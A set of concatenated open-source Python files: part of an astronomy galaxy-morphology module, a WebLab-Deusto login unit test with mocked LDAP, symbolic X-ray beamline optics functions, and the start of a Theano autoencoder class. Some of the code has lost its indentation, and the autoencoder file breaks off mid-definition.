clump.clumpness[4]) * S1**2.0)
if sigma > back_extraction_radius:
back_extraction_radius = sigma + 2.0
back_clump = clumpness(z, back_ini_xcntr, back_ini_ycntr, 0, 0,
back_extraction_radius, sigma, sky, 0)
S2 = 10.0 * back_clump.clumpness[0] / clump.clumpness[2]
error_S2 = np.sqrt((back_clump.clumpness[1] \
+ clump.clumpness[3] \
/ clump.clumpness[4]) * S2**2.0)
try:
back_clump1 = clumpness(z, back_ini_xcntr1,
back_ini_ycntr1, 0, 0,
back_extraction_radius, sigma,
sky, 0)
S3 = 10.0 * back_clump1.clumpness[0] / \
clump.clumpness[2]
error_S3 = np.sqrt((back_clump1.clumpness[1] + \
clump.clumpness[3] / \
clump.clumpness[4]) * S3**2.0)
                    S = S1 - (S2 + S3) / 2.0
ERROR_SMOO = np.sqrt(error_S1**2.0 + error_S2**2.0 + \
error_S3**2.0)
except:
S = S1 - S2
ERROR_SMOO = np.sqrt(error_S1**2.0 + error_S2**2.0)
try:
ERROR_SMOO = round(ERROR_SMOO, 4)
except:
ERROR_SMOO = 9999
# print "SMOTHNESS AND ERROR ", S, ERROR_SMOO
except:
S, ERROR_SMOO = 9999, 9999
###########################
# GINI COEFFICIENT M20 #
###########################
            extraction_radius = con.TotRad # the extraction radius was overridden by the asymmetry step
gin = gini(z, xcntr, ycntr, 0, 0, r20, r50, r80,
extraction_radius, sky, skysig)
gini_coef = gin.segmentation
# for myfile in ['segmentation.fits']:
# if os.access(myfile,os.F_OK):
# os.remove(myfile)
# Write Model galaxy image
# hdu = pyfits.PrimaryHDU(gin.segmentation.astype(Float32))
# hdu.writeto('segmentation.fits')
# Writing all the casgm parameters to agm_result_with_radius.csv
if exists("agm_result_with_radius.csv"):
pass
else:
f_tmp = open("agm_result_with_radius.csv", "ab")
tmp_writer = csv.writer(f_tmp)
tmp_ParamToWrite = ['gal_id', 'C', 'C_err', 'A', 'A_err',
'A_flag', 'image_A', 'back_A', 'A_20',
'A_20_with_zsum', 'S', 'S_err', 'r20',
'r20e', 'r50', 'r50e', 'r80', 'r80e',
'r90', 'r90e', 'extraction_radius', 'G',
'G_res', 'G80', 'G50', 'G20', 'M',
'M_res', 'M80', 'M50', 'M20']
tmp_writer.writerow(tmp_ParamToWrite)
f_tmp.close()
f_tmp = open("agm_result_with_radius.csv", "ab")
tmp_writer = csv.writer(f_tmp)
tmp_ParamToWrite = [c.fstring, con.concen, con.error_con,
ASY, ASY_ERROR, asy.image_asymm[5],
asy.image_asymm[0], back_asy.image_asymm[0],
asy_r20.image_asymm[0], 0.0, S, ERROR_SMOO,
con.r20, con.r20e, con.r50, con.r50e, con.r80,
con.r80e, con.r90, con.r90e,
extraction_radius, gini_coef[0], gini_coef[1],
gini_coef[2], gini_coef[3], gini_coef[4],
gini_coef[5], gini_coef[6], gini_coef[7],
gini_coef[8], gini_coef[9]]
tmp_writer.writerow(tmp_ParamToWrite)
f_tmp.close()
# check for nan and inf values and overmasking
if np.isnan(con.concen) or np.isinf(con.concen):
con.concen = 9999
if np.isnan(con.error_con) or np.isinf(con.error_con) or isinstance(con.error_con, np.ma.core.MaskedConstant):
#the last test is to see if the error failed because it is overmasked
con.error_con = 9999
if np.isnan(ASY) or np.isinf(ASY):
ASY = 9999
if np.isnan(ASY_ERROR) or np.isinf(ASY_ERROR):
ASY_ERROR = 9999
if np.isnan(S) or np.isinf(S):
S = 9999
if np.isnan(ERROR_SMOO) or np.isinf(ERROR_SMOO):
ERROR_SMOO = 9999
if np.isnan(gini_coef[0]) or np.isinf(gini_coef[0]):
Gini_Coef = 9999
else:
Gini_Coef = gini_coef[0]
if np.isnan(gini_coef[5]) or np.isinf(gini_coef[5]):
M20_coef = 9999
else:
M20_coef = float(gini_coef[5])
return con.concen, con.error_con, ASY, ASY_ERROR, S, ERROR_SMOO, \
Gini_Coef, M20_coef
# Example instantiation (argument values are illustrative; note the class
# takes ten arguments, ending with sky and skysig):
# CasGm('n5585_lR.fits', 'BMask.fits', 192.03, 157.42, 40.0, 40.0, 0.0, 0.0, 0.0, 0.0)
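# Illustrative sketch (not part of the original file): the same values that
# casgm() returns are appended to agm_result_with_radius.csv, which can be
# read back with the csv module:
#
#   import csv
#   with open('agm_result_with_radius.csv') as fh:
#       for row in csv.reader(fh):
#           print(row[0], row[1], row[3])  # gal_id, C, A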
|
vvinuv/pymorph
|
pymorph/casgm.py
|
Python
|
gpl-2.0
| 13,953
|
[
"Galaxy"
] |
84f72f08402ef0e80f1100ea07bdabdc40809dad33a16105753a21de96246fb5
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo@ordunya.com>
#
from __future__ import print_function, unicode_literals
from __future__ import with_statement
import sys
import unittest
import mocker
import time
try:
import ldap
except ImportError:
LDAP_AVAILABLE = False
else:
LDAP_AVAILABLE = True
from voodoo.sessions.session_id import SessionId
from voodoo.gen import CoordAddress
import voodoo.configuration as ConfigurationManager
import weblab.core.login.manager as login_manager
from weblab.core.server import UserProcessingServer
import weblab.core.server as core_api
import weblab.core.login.simple.ldap_auth as ldap_auth
import weblab.core.login.exc as LoginErrors
import test.unit.configuration as configuration_module
from test.util.wlcontext import wlcontext
fake_wrong_user = "fake_wrong_user"
fake_wrong_passwd = "fake_wrong_passwd"
fake_right_user = "student1"
fake_right_passwd = "password"
fake_ldap_user = "studentLDAP1"
fake_ldap_passwd = "password"
fake_ldap_invalid_passwd = "fake_ldap_invalid_passwd"
class LoginServerTestCase(unittest.TestCase):
def setUp(self):
coord_address = CoordAddress.translate(
"server0:instance0@machine0")
self.cfg_manager = ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self.core_server = UserProcessingServer(coord_address, None, self.cfg_manager)
def tearDown(self):
self.core_server.stop()
def test_invalid_user_and_invalid_password(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_wrong_user,
fake_wrong_passwd
)
def test_valid_user_and_invalid_password(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_right_user,
fake_wrong_passwd
)
@unittest.skipIf(not LDAP_AVAILABLE, "LDAP module not available")
def test_ldap_user_right(self):
mockr = mocker.Mocker()
ldap_auth._ldap_provider.ldap_module = mockr.mock()
with wlcontext(self.core_server):
session_id = core_api.login(fake_ldap_user, fake_ldap_passwd)
self.assertTrue( isinstance(session_id, SessionId) )
self.assertTrue( len(session_id.id) > 5 )
@unittest.skipIf(not LDAP_AVAILABLE, "LDAP module not available")
def test_ldap_user_invalid(self):
mockr = mocker.Mocker()
ldap_object = mockr.mock()
ldap_object.simple_bind_s(fake_ldap_user + '@cdk.deusto.es', fake_ldap_invalid_passwd)
mockr.throw(ldap.INVALID_CREDENTIALS)
ldap_module = mockr.mock()
ldap_module.initialize('ldaps://castor.cdk.deusto.es')
mockr.result(ldap_object)
ldap_auth._ldap_provider.ldap_module = ldap_module
with wlcontext(self.core_server):
with mockr:
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_ldap_user,
fake_ldap_invalid_passwd
)
def test_login_delay(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
        #The measured delay sometimes comes out slightly short (e.g. 0.999323...),
        #so use a margin; 0.001 should be enough, but be generous just in case
ERROR_MARGIN = 0.01
start_time = time.time()
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_wrong_user,
fake_wrong_passwd
)
finish_time = time.time()
self.assertTrue((finish_time + ERROR_MARGIN - start_time) >= login_manager.LOGIN_FAILED_DELAY)
def test_right_session(self):
with wlcontext(self.core_server):
session_id = core_api.login(fake_right_user, fake_right_passwd)
self.assertTrue( isinstance(session_id, SessionId) )
self.assertTrue( len(session_id.id) > 5 )
def suite():
return unittest.makeSuite(LoginServerTestCase)
if __name__ == '__main__':
unittest.main()
|
morelab/weblabdeusto
|
server/src/test/unit/weblab/login/test_server.py
|
Python
|
bsd-2-clause
| 4,780
|
[
"CDK"
] |
237f74a878e2c3b65f7a3930eb628cee39fb17fb4a184835a4b78ec2b1105648
|
import numpy as np
from numpy import exp
from numpy import pi
from numpy import sqrt
from numpy import log
import numpy.testing as nut
import scipy.integrate as si
import mpmath as mp
import sympy as sp
import matplotlib.pylab as plt
# This file exists only to expose the symbolic source functions IXXP and IYYP once the propagation is over
x, xp, y, yp, dl = sp.symbols('x xp y yp dl')
#DEFINITION OF MATHEMATICAL OBJECTS
#Definition of the transformation matrices
def matrixFlightSymbolic(L): # For a flight path of length L
return np.array([[1,-L,0],[0,1,0],[0,0,1]])
def matrixMonoPlaneSymbolic(b, ThetaB): # For a perfect flat crystal monochromator
return np.array([[b,0,0],[0,1/b,(1-1/b)*np.tan(ThetaB)],[0,0,1]])
def matrixMonoBentSymbolic(b, Fc, ThetaB): # For a perfect curved crystal monochromator (meridionally and sagitally focusing)
return np.array([[b,0,0],[1/Fc,1/b,(1-1/b)*np.tan(ThetaB)],[0,0,1]])
def matrixMonoMosaicSymbolic(ThetaB): # For a mosaic monochromator
return np.array([[1,0,0],[0,-1,2*np.tan(ThetaB)],[0,0,1]])
def matrixMirrorPlaneSymbolic(IncAng, Sigma, Lambda, Delta): # For the plane mirror
return exp(-(4*pi*np.sin(IncAng)*Sigma/Lambda)**2)*np.array([[1,0,0],[Delta,1,0],[0,0,1]])
def matrixMirrorSymbolic(IncAng, Sigma, Lambda, Delta, Fm, S): # For the bent and toroidal mirrors
return exp(-(4*pi*np.sin(IncAng)*Sigma/Lambda)**2)*np.array([[1,0,0],[(1+S*Fm*Delta)/Fm,1,0],[0,0,1]])
def matrixCompLensParaSymbolic(F): # For the compound refractive lenses with parabolic holes
return np.array([[1,0,0],[1/F,1,0],[0,0,1]])
def matrixCompLensCircSymbolic(Coef, F): # For the compound refractive lenses with circular holes
return np.array([[1,0,0],[Coef/F,1,0],[0,0,1]])
def matrixMultilayerSymbolic(Fmu): # For the multilayer
return np.array([[1,0,0],[1/Fmu,1,0],[0,0,1]])
#Definition of the beam source
def sourceXXPSymbolic(x, xp, SigmaXSource, SigmaXPSource):
return sp.exp(-( (x/SigmaXSource)**2 + (xp/SigmaXPSource)**2) / 2 )
def sourceYYPSymbolic(y, yp, SigmaYSource, SigmaYPSource, GammaSource):
return sp.exp( -( (y/SigmaYSource)**2 + ((yp-GammaSource*y)/SigmaYPSource)**2)/2 )
def sourceLambdaSymbolic(dl, SigmaSLambda):
return sp.exp(-dl**2/2/SigmaSLambda**2)
#Definition of the acceptance windows of the optical parts
def cotanSymbolic(x):
return 1/np.tan(x)
def acceptanceSlitSymbolic(y, Aperture, calctype): #Slit acceptance
if calctype==0:
return sqrt(6/pi) / sqrt(6*log(2)/pi) * sp.exp( -(y/Aperture)**2/2*12)
if calctype==1:
return 1/sqrt(6*log(2)/pi)*sp.exp(-y**2/(2*Aperture**2/2/pi))
else:
        raise ValueError('calctype must be 0 or 1')
def acceptancePinSymbolic(y, Diameter): #Pinhole acceptance
return sqrt(8/pi) * sp.exp ( -(y/Diameter)**2/2*16 )
def acceptanceAngleMonoPlaneSymbolic(yp, DeltaLambda, ThetaB, Wd, RMono, RInt): #Plane monochromator angle acceptance
return RMono*RInt*sqrt(6/pi)/Wd * sp.exp( -(yp-DeltaLambda*np.tan(ThetaB))**2 / (2*Wd**2/12))
def acceptanceWaveMonoPlaneSymbolic(DeltaLambda, SigmaYp, ThetaB, Wd): #Plane monochromator wave acceptance
return sqrt(6/pi) * sp.exp( - (DeltaLambda)**2 / (2*(SigmaYp**2+Wd**2/12)*cotanSymbolic(ThetaB)**2) )
def acceptanceAngleMonoMosaicSymbolic(yp, DeltaLambda, ThetaB, eta, RInt): #Mosaic monochromator angular acceptance
return RInt*sqrt(6/pi)/eta * sp.exp(- (yp-DeltaLambda*np.tan(ThetaB))**2 / eta**2 /2 )
def acceptanceWaveMonoMosaicSymbolic(DeltaLambda, SigmaYp, ThetaB, eta): #Mosaic monochromator wave acceptance
return sqrt(6/pi) * sp.exp( - (DeltaLambda)**2 / 2 /((SigmaYp**2+eta**2)*cotanSymbolic(ThetaB)**2))
def acceptanceAngleMonoBentSymbolic(y, yp, DeltaLambda, Alpha, ThetaB, Wd, r, RMono, RInt): #Curved monochromator angle acceptance
return RMono*RInt*sqrt(6/pi)/Wd * sp.exp( - (yp-y/r/np.sin(ThetaB+Alpha)-DeltaLambda*np.tan(ThetaB))**2/(2*Wd**2/12))
def acceptanceWaveMonoBentSymbolic(DeltaLambda, ThetaB, DistanceFromSource, Wd, SigmaSource): #Curved monochromator wave acceptance
return sqrt(6/pi) * sp.exp( -(DeltaLambda)**2 / (2*cotanSymbolic(ThetaB)**2*((SigmaSource/DistanceFromSource)**2+Wd**2/12)) )
def acceptanceCompLensParaSymbolic(x, Radius, Distance, Sigma): #Compound refractive lense with parabolic holes acceptance
return sp.exp( -(x**2+Radius*Distance)/2/Sigma**2)
def acceptanceCompLensCircSymbolic(x, Radius, Distance, Sigma, FWHM): #Compound refractive lense with circular holes acceptance
return sp.exp( -x**2/2/Sigma**2 -x**2*FWHM**2/8/Radius**2/Sigma**2 -x**2*FWHM**4/16/Sigma**2/Radius**4 -Radius*Distance/2/Sigma**2 )
def acceptanceAngleMultiSymbolic(y, yp, DeltaLambda, ThetaML, Rml, Rowland, Ws): #Multilayer angle acceptance
return Rml*8/3*sqrt(log(2)/pi) * sp.exp( -(-yp-y/Rowland/np.sin(ThetaML)-DeltaLambda*np.tan(ThetaML))**2*8*log(2)/2/Ws**2 )
def acceptanceWaveMultiSymbolic(DeltaLambda, ThetaML, DistanceFromSource, Ws, SigmaSource): #Multilayer wave acceptance
return sqrt(6/pi) * sp.exp( -(DeltaLambda)**2/2/((SigmaSource/DistanceFromSource)**2+Ws**2/8/log(2))/cotanSymbolic(ThetaML)**2)
# Useful functions for the calculation part
def buildMatTabSymbolic(ListObject, ListDistance):
n = len(ListObject)
    if not ListDistance:
        raise ValueError('ListDistance is empty')
else :
        # the first element must be a transfer matrix, not a bare distance
        MatTabX = [matrixFlightSymbolic(ListDistance[0])]
        MatTabY = [matrixFlightSymbolic(ListDistance[0])]
if n == 0:
return [MatTabX, MatTabY]
else :
for k in range(n):
MatTabX.append(ListObject[k][-1])
MatTabX.append(matrixFlightSymbolic(ListDistance[k+1]))
MatTabY.append(ListObject[k][-2])
MatTabY.append(matrixFlightSymbolic(ListDistance[k+1]))
return [MatTabX, MatTabY]
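# Illustrative sketch (not part of the original file): build the matrix
# tables for a beamline with a single slit between two flight paths of
# 10 m and 5 m. Each ListObject entry ends with its Y- and X-plane transfer
# matrices ([-2] and [-1] respectively); all values here are hypothetical:
#
#   slit = ['Slit', 1e-3, 1e-3, 0,
#           matrixFlightSymbolic(0),   # [-2]: Y-plane matrix (identity here)
#           matrixFlightSymbolic(0)]   # [-1]: X-plane matrix (identity here)
#   MatTabX, MatTabY = buildMatTabSymbolic([slit], [10.0, 5.0])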
def propagateMatrixListSymbolic(x, xp, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY):
# initiating variables, copies of the arrays are created
MX = MatTabX.copy()
MY = MatTabY.copy()
MatTempX = np.array([x, xp, dl])
MatTempY = np.array([y, yp, dl])
    # the case of a single propagation has to be handled separately because of a range-indexing problem
if len(MX)==1:
MatTempX = np.dot(MX[0], MatTempX)
MatTempY = np.dot(MY[0], MatTempY)
NewSourceX = sourceXXPSymbolic(MatTempX[0], MatTempX[1], SigmaXSource, SigmaXPSource)
NewSourceY = sourceYYPSymbolic(MatTempY[0], MatTempY[1], SigmaYSource, SigmaYPSource, GammaSource)
# now we do the general case
else :
#first matrix multiplication
for i in range(len(MX)-1, -1, -1):
MatTempX = np.dot(MX[i], MatTempX)
MatTempY = np.dot(MY[i], MatTempY)
NewSourceX = sourceXXPSymbolic(MatTempX[0], MatTempX[1], SigmaXSource, SigmaXPSource)
NewSourceY = sourceYYPSymbolic(MatTempY[0], MatTempY[1], SigmaYSource, SigmaYPSource, GammaSource)
del MX[0]
del MY[0]
k = 0
        #apply the matrix product, then the acceptance window if needed, and
        #compute the new resulting source; afterwards drop the first two
        #matrices and repeat until both arrays are empty
while MX!=[] and MY!=[]:
for i in range(len(MX)-1,-1,-1):
MatTempX = np.array([x, xp, dl])
MatTempY = np.array([y, yp, dl])
MatTempX = np.dot(MX[i],MatTempX)
MatTempY = np.dot(MY[i], MatTempY)
if ListObject[k][0] == 'Slit':
NewSourceX = NewSourceX * acceptanceSlitSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][3])
NewSourceY = NewSourceY * acceptanceSlitSymbolic(MatTempY[0], ListObject[k][2], ListObject[k][3])
elif ListObject[k][0] == 'Pinhole' :
NewSourceX = NewSourceX * acceptancePinSymbolic(MatTempX[0], ListObject[k][1])
                NewSourceY = NewSourceY * acceptancePinSymbolic(MatTempY[0], ListObject[k][1])  # use the Y coordinate here
elif ListObject[k][0] == 'MonoPlaneVertical':
NewSourceY = NewSourceY * acceptanceAngleMonoPlaneSymbolic(MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceY = NewSourceY * acceptanceWaveMonoPlaneSymbolic(MatTempY[2], bMonoY*SigmaYPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MonoPlaneHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoPlaneSymbolic(MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceX = NewSourceX * acceptanceWaveMonoPlaneSymbolic(MatTempX[2], bMonoX*SigmaXPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MultiHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMultiSymbolic(MatTempX[0], MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceX = NewSourceX * acceptanceWaveMultiSymbolic(MatTempX[2], ListObject[k][1], ListObject[k][5], ListObject[k][4], SigmaXSource)
elif ListObject[k][0] == 'MultiVertical' :
NewSourceY = NewSourceY * acceptanceAngleMultiSymbolic(MatTempY[0], MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceY = NewSourceY * acceptanceWaveMultiSymbolic(MatTempY[2], ListObject[k][1], ListObject[k][5], ListObject[k][4], SigmaYSource)
elif ListObject[k][0] == 'MonoBentHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoBentSymbolic(MatTempX[0], MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4], ListObject[k][5], ListObject[k][6])
NewSourceX = NewSourceX * acceptanceWaveMonoBentSymbolic(MatTempX[2], ListObject[k][2], ListObject[k][7], ListObject[k][3], SigmaXSource)
elif ListObject[k][0] == 'MonoBentVertical' :
NewSourceY = NewSourceY * acceptanceAngleMonoBentSymbolic(MatTempY[0], MatTempY[1], MatTempY[2],ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4], ListObject[k][5], ListObject[k][6])
                NewSourceY = NewSourceY * acceptanceWaveMonoBentSymbolic(MatTempY[2], ListObject[k][2], ListObject[k][7], ListObject[k][3], SigmaYSource)  # vertical plane uses the Y source size
elif ListObject[k][0] == 'MonoMosaicHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoMosaicSymbolic(MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3])
NewSourceX = NewSourceX * acceptanceWaveMonoMosaicSymbolic(MatTempX[2], SigmaXPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MonoMosaicVertical' :
NewSourceY = NewSourceY * acceptanceAngleMonoMosaicSymbolic(MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3])
NewSourceY = NewSourceY * acceptanceWaveMonoMosaicSymbolic(MatTempY[2], SigmaYPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'LensParabolicHorizontal':
NewSourceX = NewSourceX * acceptanceCompLensParaSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensParabolicVertical':
NewSourceY = NewSourceY * acceptanceCompLensParaSymbolic(MatTempY[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensParabolic2D':
NewSourceX = NewSourceX * acceptanceCompLensParaSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
NewSourceY = NewSourceY * acceptanceCompLensParaSymbolic(MatTempY[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensIdeal2D':
pass
elif ListObject[k][0] == 'LensIdealHorizontal':
pass
elif ListObject[k][0] == 'LensIdealVertical':
pass
elif ListObject[k][0] == 'Mirror':
pass
else:
raise Exception("Wrong element name")
k = k +1
del MX[0:2]
del MY[0:2]
return [NewSourceX, NewSourceY]
def sourceFinaleSymbolic(SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, SigmaSLambda, GammaSource, MatTabX, MatTabY, ListObject, SourceI, bMonoX, bMonoY):
# IXXP = lambda x, xp, dl : propagateMatrixList(x, xp, 0, 0, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[0]
# IYYP = lambda y, yp, dl : propagateMatrixList(0, 0, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[1]
# ISigma = lambda dl : sourceLambda(dl, SigmaSLambda) * SourceI
IXXP = propagateMatrixListSymbolic(x, xp, 0, 0, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[0]
IYYP = propagateMatrixListSymbolic(0, 0, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[1]
ISigma = sourceLambdaSymbolic(dl, SigmaSLambda) * SourceI
return IXXP,IYYP, ISigma
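# Illustrative end-to-end sketch (not part of the original file; all sigma
# values are hypothetical): propagate the source through the single-slit
# beamline sketched after buildMatTabSymbolic() above and inspect the
# resulting symbolic intensities:
#
#   IXXP, IYYP, ISigma = sourceFinaleSymbolic(
#       1e-4, 1e-5, 1e-4, 1e-5, 1e-3, 0.0,
#       MatTabX, MatTabY, [slit], 1.0, 1.0, 1.0)
#   print(sp.simplify(IYYP))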
|
Evenity/py_psa
|
py_psa/psa_functions_symbolic.py
|
Python
|
mit
| 14,345
|
[
"CRYSTAL"
] |
287efb6e0414c7f3419ec5cc1e09cf8edd0e01b771df9f11d2cf51c76448654d
|
"""
.. module::
:platform: Unix
:synopsis: This module contains the Autoencoder class definition.
.. moduleauthor: Jan Hajic <hajicj@gmail.com>
"""
import cPickle
import numpy
import theano
import theano.tensor as TT
from theano.tensor.shared_randomstreams import RandomStreams
from safire.learning.models.base_unsupervised_model import BaseUnsupervisedModel
class Autoencoder(BaseUnsupervisedModel):
"""The Autoencoder model.
Optimizes reconstruction error with a cross-entropy loss function.
"""
def __init__(self, inputs, n_in, n_out=100,
activation=TT.nnet.sigmoid,
backward_activation=TT.nnet.sigmoid,
reconstruction='cross-entropy',
W=None, W_prime=None, b=None, b_prime=None,
tied_weights=True,
L1_norm=0.0, L2_norm=0.0, bias_decay=0.0,
sparsity_target=None, output_sparsity_target=None,
rng=numpy.random.RandomState(),
theano_rng=None):
"""Initialize the parameters of the Autoencoder.
An Autoencoder is an unsupervised model that tries to minimize
reconstruction error on input.
:type inputs: theano.tensor.TensorType
        :param inputs: Symbolic variable that describes the input
of the architecture (e.g., one minibatch of
input images, or output of a previous layer)
:type n_in: int
:param n_in: Number of input units, the dimension of the space
in which the data points live
:type n_out: int
:param n_out: The number of output/hidden units.
:type activation: theano.tensor.elemwise.Elemwise
:param activation: The nonlinearity applied at neuron
output.
        :type reconstruction: str
        :param reconstruction: Which reconstruction cost to use. Accepts
            ``cross-entropy``, ``mse`` (mean squared error) and
            ``exaggerated-mse``.
:type W: theano.tensor.sharedvar.TensorSharedVariable
:param W: Theano variable pointing to a set of weights that should
be shared between the autoencoder and another architecture;
if autoencoder should be standalone, leave this as None.
This set of weights refers to the transition from visible
to hidden layer.
:type W_prime: theano.tensor.sharedvar.TensorSharedVariable
:param W_prime: Theano variable pointing to a set of weights that
should be shared between the autoencoder and another
architecture; if autoencoder should be standalone,
leave this as None. This set of weights refers to
the transition from the hidden to the visible layer.
:type b: theano.tensor.sharedvar.TensorSharedVariable
:param b: Theano variable pointing to a set of bias values that
should be shared between the autoencoder and another
architecture; if autoencoder should be standalone,
leave this as None. This set of bias values refers
to the transition from visible to hidden layer.
        :type b_prime: theano.tensor.sharedvar.TensorSharedVariable
        :param b_prime: Theano variable pointing to a set of bias values
                        that should be shared between the autoencoder and
                        another architecture; if autoencoder should be
                        standalone, leave this as None. This set of bias
                        values refers to the transition from the hidden
                        to the visible layer.
:type tied_weights: bool
:param tied_weights: If True (default), forces W_prime = W.T, i.e.
the visible-hidden transformation and the
hidden-visible transformation use the same
weights.
:type sparsity_target: float
:param sparsity_target: The target mean for features. If set, incurs
a sparsity penalty: the KL divergence of a unit being either off,
or on.
:type output_sparsity_target: float
:param output_sparsity_target: The sparsity target for output vectors
instead of features.
:type L1_norm: float
:param L1_norm: L1 regularization weight (absolute value of each
parameter).
:type L2_norm: float
:param L2_norm: L2 regularization weight (quadratic value of each
parameter).
:type bias_decay: float
:param bias_decay: Adds an extra L2 penalty on the bias terms.
"""
super(Autoencoder, self).__init__(inputs, n_in, n_out)
self.activation = activation
self.backward_activation = backward_activation
self.tied_weights = tied_weights # Bookkeeping, basically.
self.reconstruction = reconstruction
self.L1_norm = L1_norm
self.L2_norm = L2_norm
self.bias_decay = bias_decay
self.sparsity_target = sparsity_target
self.output_sparsity_target = output_sparsity_target
if not W:
W = self._init_weights('W', (n_in, n_out), rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(W, (n_in, n_out))
self.W = W
# W_prime needs different behavior for tied_weights=True/False
self.W_prime = None
if tied_weights is True:
self.W_prime = self.W.T
else:
if not W_prime:
W_prime = self._init_weights('W_prime', (n_out, n_in), rng)
else: # Check for consistency of supplied weights
self._init_param_consistency_check(W_prime, (n_out, n_in))
self.W_prime = W_prime
if not b:
b = self._init_bias('b', n_out, rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(b, (n_out,))
self.b = b
if not b_prime:
            # initialize the biases b_prime as a vector of n_in 0s
b_prime = self._init_bias('b_prime', n_in, rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(b_prime, (n_in,))
self.b_prime = b_prime
# Different params for tied weights!
# This will be difficult to put in a general method.
self.params = [self.W, self.b, self.b_prime]
if not self.tied_weights:
self.params.append(self.W_prime)
# Compatibility of interface
self.outputs = self.activation(TT.dot(inputs, self.W) + self.b)
if theano_rng is None:
theano_rng = RandomStreams(rng.randint(2 ** 30))
self.theano_rng = theano_rng
def _init_args_snapshot(self):
"""Saves the model in the form of an init kwarg dict, since not all
attributes of the instance can be pickled. Upon loading, the saved
model kwarg dict will be used as ``**kwargs`` (the ``load`` method
is a classmethod) for an initialization of the model."""
init_arg_dict = {
'W' : self.W,
'W_prime' : self.W_prime,
'b' : self.b,
'b_prime' : self.b_prime,
'n_in' : self.n_in,
'n_out' : self.n_out,
'activation' : self.activation,
'tied_weights' : self.tied_weights,
'inputs' : self.inputs,
'reconstruction' : self.reconstruction,
'L1_norm': self.L1_norm,
'L2_norm': self.L2_norm,
'bias_decay': self.bias_decay,
'sparsity_target': self.sparsity_target,
'output_sparsity_target': self.output_sparsity_target,
# Random number generators are ignored?
}
return init_arg_dict
def mean_h_given_v(self, inputs):
"""Computes the activation of the hidden units.
:type inputs: theano.tensor.TensorType
:param inputs: Values of the visible units (i.e. rows of data).
:returns: The activation on hidden units, as symbolic expression
bound to ``inputs``.
"""
return self.activation(TT.dot(inputs, self.W) + self.b)
def mean_v_given_h(self, hidden_values):
"""Computes the activation of the visible units on reconstruction.
:type hidden_values: theano.tensor.TensorType
:param hidden_values: Values of the hidden units.
:returns: The activation on visible units, as symbolic expression
bound to ``hidden_values``. This is the reconstructed activation.
"""
return self.backward_activation(TT.dot(hidden_values, self.W_prime) + self.b_prime)
    def sample_v_given_h(self, hidden):
        """Samples the visible layer given the hidden layer."""
        # Reuse mean_v_given_h(); the original inlined this expression with
        # the forward/backward activations accidentally swapped.
        mean_v = self.mean_v_given_h(hidden)
        sample_v = self.theano_rng.binomial(size=mean_v.shape,
                                            n=1, p=mean_v,
                                            dtype=theano.config.floatX)
        return sample_v
    def sample_h_given_v(self, visible):
        """Samples the hidden layer given the visible layer."""
        # Reuse mean_h_given_v() for the same reason as above.
        mean_h = self.mean_h_given_v(visible)
        sample_h = self.theano_rng.binomial(size=mean_h.shape,
                                            n=1, p=mean_h,
                                            dtype=theano.config.floatX)
        return sample_h
def sample_vhv(self, visible):
"""Performs one Gibbs sampling step from visible to visible layer."""
return self.sample_v_given_h(self.sample_h_given_v(visible))
def sample_hvh(self, hidden):
